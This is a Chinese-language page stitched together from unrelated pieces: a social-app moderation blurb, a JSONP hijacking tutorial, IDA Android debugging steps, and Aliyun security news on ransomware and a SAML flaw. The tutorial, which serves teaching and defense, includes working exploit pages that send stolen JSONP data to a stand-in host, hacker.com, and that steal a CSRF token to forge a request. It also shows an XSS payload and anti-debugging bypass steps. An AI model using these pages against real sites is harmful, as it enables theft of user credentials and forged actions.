互联网社交应用存在哪些内容安全风险？如何解决？
社交应用基于用户关系进行信息分享、传播以及获取，在社交应用中，用户可以上传用户头像、设置用户昵称，发布相册图库和短视频内容，以及语音聊天室和社交动态分享，对好友发布的信息进行评论等。在社交电商中，还存在商品发布、商品图像和视频描述、消费评价、购物分享等。社交应用平台上存在大量UGC内容，传播快速，一旦岀现严重违规信息且大范围传播，影响极大，甚至会成为社会事件。因此，社交类应用一直是被监管重点管控的行业，需要对所有传播的视频、图像、评论进行违规内容审核后才可发布。
对于社交应用，建议采用公共云API方式，对图片、视频、音频、文本进行涉黄、涉政暴恐、不良场景、垃圾广告检测。客户系统通过调用内容检测API，内容安全算法返回建议的处置结果，根据返回结果，再判定是否进行人工复审，做到对违规内容及时处置，避免传播。
更多小知识请关注我持续更新~

JSONP介绍
说起跨域请求资源的方法，最常见的方法是JSONP/CORS。下面以具体的例子介绍一下JSONP的工作原理。
JSONP全称是JSON with Padding ，是基于JSON格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里  元素标签没有跨域限制
JSONP原理就是动态插入带有跨域url的script标签，然后调用回调函数，把我们需要的json数据作为参数传入，通过一些逻辑把数据显示在页面上。
比如通过script访问http://www.test.com/index.html?jsonpcallback=callback, 执行完script后，会调用callback函数，参数就是获取到的数据。
原理很简单，在本地复现一下，首先新建callback.php:
<!-- callback.php -->

<?php
    header('Content-type: application/json');
    $callback = $_GET["callback"];
    //json数据
    $json_data = '{"customername1":"user1","password":"12345678"}';
    //输出jsonp格式的数据
    echo $callback . "(" . $json_data . ")";
?>
然后新建test.html:
<!-- test.html -->

<html>
<head>
<title>test</title>
<meta charset="utf-8">
<script type="text/javascript">
function hehehe(obj){
    alert(obj["password"]);
}
</script>
</head>
<body>
<script type="text/javascript" src="http://localhost/callback.php?callback=hehehe"></script>
</body>
</html>
我们访问test.html，页面会执行script，请求http://localhost/callback.php?callback=hehehe，然后将请求的内容作为参数，执行hehehe函数，hehehe函数将请求的内容alert出来。最终的结果如下
这样我们就实现了通过js操作跨域请求到的资源，绕过了同源策略。
但是伴随着业务的发展总会出现安全问题，JSONP使用不当也会造成很多安全问题。
JSONP劫持
对于JSONP传输数据，正常的业务是用户在B域名下请求A域名下的数据，然后进行进一步操作。
但是对A域名的请求一般都需要身份验证，hacker怎么去获取到这些信息呢，我们可以自己构造一个页面，然后诱惑用户去点击，在这个页面里，我们去请求A域名资源，然后回调函数将请求到的资源发回到hacker服务器上。
没错JSONP劫持属于CSRF漏洞，步骤大概如下图(来自参考文章1)所示：
利用代码如下所示：
<html>
<head>
<title>test</title>
<meta charset="utf-8">
<script type="text/javascript">
function hehehe(obj){
    var myForm = document.createElement("form");
    myForm.action="http://hacker.com/redirect.php";
    myForm.method = "GET";  
    for ( var k in obj) {  
        var myInput = document.createElement("input");  
        myInput.setAttribute("name", k);  
        myInput.setAttribute("value", obj[k]);  
        myForm.appendChild(myInput);  
    }  
    document.body.appendChild(myForm);  
    myForm.submit();  
    document.body.removeChild(myForm);
}
</script>
</head>
<body>
<script type="text/javascript" src="http://localhost/callback.php?callback=hehehe"></script>
</body>
</html>
诱惑用户访问此html，会以用户的身份访问http://localhost/callback.php?callback=hehehe,拿到敏感数据，然后执行hehehe函数，将数据发送给http://hacker.com/redirect.php。抓包可以拦截到如下请求包：
GET /redirect.php?customername1=user1&password=12345678 HTTP/1.1
Host: hacker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.133.136.120/test.html
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
hacker只需要在redirect.php里，将数据保存下来，然后重定向到http://baidu.com，堪称一次完美的JSONP劫持。
利用JSONP绕过token防护进行csrf攻击
具体的实例可以看看参考文章2，3。
通过上面例子，我们知道JSONP可以获取敏感的数据，在某些情况下，还可以利用JSONP劫持绕过token限制完成csrf攻击。
假设有个场景是这样：服务端判断接收到的请求包，如果含有callback参数就返回JSONP格式的数据，否则返回正常页面。代码如下：test.php
<!-- callback.php -->

<?php
    header('Content-type: application/json');
    //json数据
    $json_data = '{"customername1":"user1","password":"12345678"}';
    if(isset($_GET["callback"])){
        $callback = $_GET["callback"];
        //如果含有callback参数，输出jsonp格式的数据
        echo $callback . "(" . $json_data . ")";
    }else{
        echo $json_data;
    }
?>
对于场景，如果存在JSONP劫持劫持，我们就可以获取到页面中的内容，提取出csrf_token，然后提交表单，造成csrf漏洞。示例利用代码如下(来自参考文章2)：
<html>
<head>
<title>test</title>
<meta charset="utf-8">
</head>
<body>
<div id="test"></div>
<script type="text/javascript">
function test(obj){
    // 获取对象中的属性值
    var content = obj['html']
    // 正则匹配出参数值
    var token=content.match('token = "(.*?)"')[1];
    // 添加表单节点
    var parent=document.getElementById("test");
    var child=document.createElement("form");
    child.method="POST";
    child.action="http://vuln.com/del.html";
    child.id="test1"
    parent.appendChild(child);
    var parent_1=document.getElementById("test1");
    var child_1=document.createElement("input");
    child_1.type="hidden";child_1.name="token";child_1.value=token;
    var child_2=document.createElement("input");
    child_2.type="submit";
    parent_1.appendChild(child_1);
    parent_1.appendChild(child_2);
}
</script>
<script type="text/javascript" src="http://vuln.com/caozuo.html?htmlcallback=test"></script>
</body>
</html>
htmlcallback返回一个对象obj，以该对象作为参数传入test函数，操作对象中属性名为html的值，正则匹配出token，再加入表单，自动提交表单完成操作，用户点击该攻击页面即收到csrf攻击。
JSONP劫持挖掘与防御
对于漏洞挖掘，我们首先需要尽可能的找到所有的接口，尤其是返回数据格式是JSONP的接口。(可以在数据包中检索关键词callback json jsonp email等，也可以加上callback参数，观察返回值是否变化)。
找到接口之后，还需要返回值包含敏感信息，并且能被不同的域的页面去请求获取(也就是是否存在refer限制,实际上，如果接口存在refer的限制，也是有可能被绕过的，计划以后的文章中再说)
对于JSONP劫持的防御，其实类似于csrf的防御。以下来源于参考文章4:
限制来源refer
按照JSON格式标准输出（设置Content-Type : application/json; charset=utf-8），预防http://127.0.0.1/getUsers.php?callback=<script>alert(/xss/)</script>形式的xss
过滤callback函数名以及JSON数据输出，预防xss
参考
JSONP 劫持原理与挖掘方法
JSONP绕过CSRF防护token
分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
JSONP 安全攻防技术

7-5、使用IDA动态调试.so文件
一、应用体系架构：动态分析分析什么？
代码安全分析。有无被篡改，盗版等风险，是否容易被反编译，重打包。
组件安全分析。四大组件和通信Intent分析，以及他们权限使用不当带来的问题。
存储安全分析。对存储的私有文件，证书文件，数据库文件进行安全验证分析，尤其是明文数据。
通信安全分析。通信传输中的加密等问题。
漏洞分析。有无安全漏洞以及漏洞危害。
系统安全分析。有无系统缺陷。
工具：IDA(32位/非常重要)。以下步骤基本可以绕过反调试了，反调试在后边有说明
一、架设调试桥
1、上传IDA调试服务器地址：
G:\xxxxxx\IDAPro70\dbgsrv\android_server           //保证IDA和设备的正常通信

2、cmd进入到该目录下: G:\xxxxxxx\IDAPro70\dbgsrv\
3、导入IDA调试服务器：adb push android_server /data/local/tmp
4、adb shell
5、cd到/data/local/tmp下：chmod 777 android_server
6、./android_server(如果失败重启手机)
二、部署安卓
1、端口转发：
adb forward tcp:23946 tcp:23946

2、查看23946端口的使用情况：
netstat -ano | findstr 23946      //实际中不用查看，成功转发了即可

3、adb shell下执行：
am start -D -n com.e.te/com.e.te.MainActivity（包名/启动页面）          //启动页面不一定是这样

4、会弹出框
5、抓包进行信息搜集，包括关键URL、关键字段等。
三、部署IDA（此时打开IDA就行，点击“go”，不要添加任何东西）
建议打开两个IDA界面，一个用于动态调试，另一个用户静态查找
1、IDA-debugger-Attach-remote ARMlinux/Android debugger
2、填入IP（localhost/127.0.0.1）、密码没有不用填，保存默认网络设置
3、高级设置：左边345，右边：235，下面：3。保存设置
4、点击要调试的包名选入
5、此时相关的应用程序将显示红色蜘蛛
四、开始调试
1、在IDA中点击运行（此步骤非常重要）  //也可以先执行第二步
2、输入命令:
jdb -connect com.sun.jdi.SocketAttach:port=8700,hostname=localhost 
//新建命令执行

3、点击debugger-debugger windows-module list，并在窗口找到要调试的程序
4、在IDA中暂停调试按钮，暂停当前调试。F9重新开始调试
5、在找到的要调试的程序下，继续寻找我们需要下断点的函数处。此时so已经加载进来，先获取JNI_OnLoad函数的绝对地址。Ctrl+s即可找到基地址，静态搜索关键字即可得到先相对地址，相加即可得到绝对地址，然后跳转到绝对地址即可。注意下断点
6、在汇编代码处，按下alt+T，搜索断点函数名
7、下断点，运行IDA，如果在断点处停止，说明已经可以进行断点动态调试
8、重点在libc.so中下断点，因为该文件是C层中最基本的函数库，libc中封装了io、文件、socket等系统基本调用。也可以是linker.so或者libdvm.so中下断点
五、调试WebViewApp
1、chrome插件调试，类似于firebug。按F12可以召唤该工具
2、WebView已知漏洞
A、远程代码执行漏洞。是webview中使用了javascriptInterface造成的，让远程网页执行本地命令。
B、UXSS漏洞。通用型XSS是一种利用浏览器或浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型，导致浏览器全局远程执行命令，绕过同源策略，窃取用户资料，劫持用户等危害。
3、网络钓鱼(涉及二维码安全)。SQL注入攻击。

                    







【金融行业安全动态】JP摩根大通首次承认加密货币是“风险”





概要：在周二下午发布的JP摩根大通年度报告中，该银行首次将比特币和以太坊等加密货币列为其业务面临的“风险因素”，承认数字货币是新的竞争形式，实际上会与这家银行激烈竞争。
该银行在报告中写道：“金融机构和非银行竞争对手都面临一个风险，那就是支付处理和其他服务可能会被诸如加密货币之类不需要中介的技术所颠覆。”
该银行补充道，新技术已经要求该公司投入资金，调整或修改产品以吸引和留住客户，并与来自科技新兴公司的新产品展开竞争，预计这个趋势会持续下去。报告称：“持续或加剧的竞争可能会给JP摩根大通的产品和服务的价格和费用带来下行压力，或者导致JP摩根大通失去市场份额。”
在这家银行披露报告前，竞争对手美国银行上周在自己的年度报告中也有过类似的承认。在那份提交的报告中，美国银行特别强调了这个潜在的风险：客户们转向“在我们认为投机性或高风险的领域（比如加密货币）”提供产品和服务的竞争对手。
JP摩根大通的发言人拒绝评论该公司为何现在决定将加密货币列入其面临的风险因素。不过这家银行已越来越认识到了区块链技术和基于该技术的加密货币具有的颠覆性力量，该银行已成为率先倡导自行开发基于以太坊的区块链的金融机构之一。比如本月早些时候，JP摩根大通的区块链项目负责人奥马尔•法鲁克（Umar Farooq）向外界介绍了这家银行内部在如何迅速积极地采用这项技术。（来源：云头条）





【金融行业安全动态】比特大陆利润或赶超英伟达



概要：伯恩斯坦（Bernstein）的分析师估算，比特大陆（Bitmain）正成为比特币“挖矿”行业的领军企业，而且去年的营业利润或与美国芯片巨头英伟达持平。分析师计算后认为，按照 75％ 的毛利率和 65％ 的经营利润率的保守估计，比特大陆在 2017 年的营业利润为 30 亿美元至 40 亿美元。则英伟达公司同期的营业利润可为 30 亿美元，实现了英伟达24年的目标。（来源：新智元）

【相关安全事件】SSO统一身份认证SAML安全绕过漏洞，AWS/微软/Google受影响
概要：美国CERT给出的受影响范围较大，涉及15家主流安全厂商和CSP。攻击者利用SAML漏洞无须知道受害者密码，就可以通过他的账户验证。该漏洞关联到6个CVE ID，目前影响5个供应商。美国CERT发出预警通告。阿里云未用SAML，不受影响。（来源：安全+）。


【相关安全事件】独家技术分析：新型勒索病毒MindLost
概要：阿里云安全团队分析后发现，该病毒运行后会”隐藏”自己，然后后台加密采用随机秘钥的128位的aes算法，加密样本账户的电脑的Users目录下的文件，如果后缀为".txt",".jpg",".png",".pdf",".mp4",".mp3",".c",".py"的文件就直接加密，且解密赎金达到200美元。
点评：目前，阿里云安全团队总共获取到Mindlost的6个样本文件，通过时间戳分析，最早编译时间在2018.01.15, 此时的样本并未做代码混淆。
在2018.01.25编译的版本中，已经对代码做了混淆。但所有样本都包含调试信息，其中较为敏感的是pdb文件路径” 
/Users/danielohayon/Documents/Mindlost/Mindlost/Mindlost/Encryptor/obj/Debug/Encryptor.pdb”，Mindlost的名字也是来自于此，路径中还包含了样本账户名danielohayon，由此猜测该勒索病毒还在开发中，就被已各安全人员发现。
当然，也不排除作者故意留下关键路径迷惑大家。
像这样的勒索软件样本，阿里云安全团队每天都会处理很多，大多都能通过及时的预警，病毒库与防御规则更新，将其在云上的影响降至最低。截至2月3日，阿里云平台客户不受MindLost勒索软件影响。


补充阅读：
阿里云安全团队建议：https://yq.aliyun.com/articles/427148?spm=a2c4e.11155435.0.0.1ba8a9dbcPcizn
加密勒索病毒处理方案 https://help.aliyun.com/knowledge_detail/50358.html

加密勒索事件防护方案 https://help.aliyun.com/knowledge_detail/48701.html


【云上视角】医院成黑客勒索重灾区 阿里云表示：愿为医疗机构提供安全公益排查支持


概要：近年来，随着医院信息化建设力度的加大，医院的信息安全问题也成为业界关注的焦点。我国的医院信息化安全建设主要存在三大误区：


第一就是误认为医院网络通常是隔离的内网，不会有安全问题，因此不注重安全建设；
第二是头痛医头，脚痛医脚的安全建设思路，哪儿出了问题补哪儿，不注重体系化和纵深防御；






第三是以静态的观念去搞安全建设，买了一堆的盒子设备，却不注重安全运营。因而造成医院的信息系统防护能力偏弱，同时医疗机构工作人员网络安全意识薄弱，因此容易成为黑客攻击勒索的对象。


点评：阿里云安全事业部总经理肖力认为，虚拟货币的匿名性和价格持续高涨，提高了追踪难度，也让更多黑客愿意铤而走险，变种的勒索软件还会长期持续存在，攻击事件会越来越多。


信息时代技术更替交叠，变化非常快，一个勒索病毒可能24小时之后就会发生你想象不到的变化或者说时间会更短，或许今天这件事是因为这个病毒，可能下一次是另一个病毒或者是其他系统漏洞带来的未可知的威胁，但是其最终迫害力是类似的。欢迎对云上安全排查有需求的机构在阿里云安全产业扶助计划（https://security.aliyun.com/grow）申请，我们会审核评估之后，提供免费安全检测、技术咨询等服务。





快来阿里云新年采购季限时优惠（点击直接进入会场）
9大实用安全产品，助力企业快速优化安全效果。
把好第一道ROI关卡，让企业安全在2018年全面升级。
今天，从这里开始！






订阅 NEWS FROM THE LAB


一键订阅刊物

云栖社区专栏获取最新资讯
微博专栏获取最新资讯
一点号获取最新资讯








扫码参与全球安全资讯精选
读者调研反馈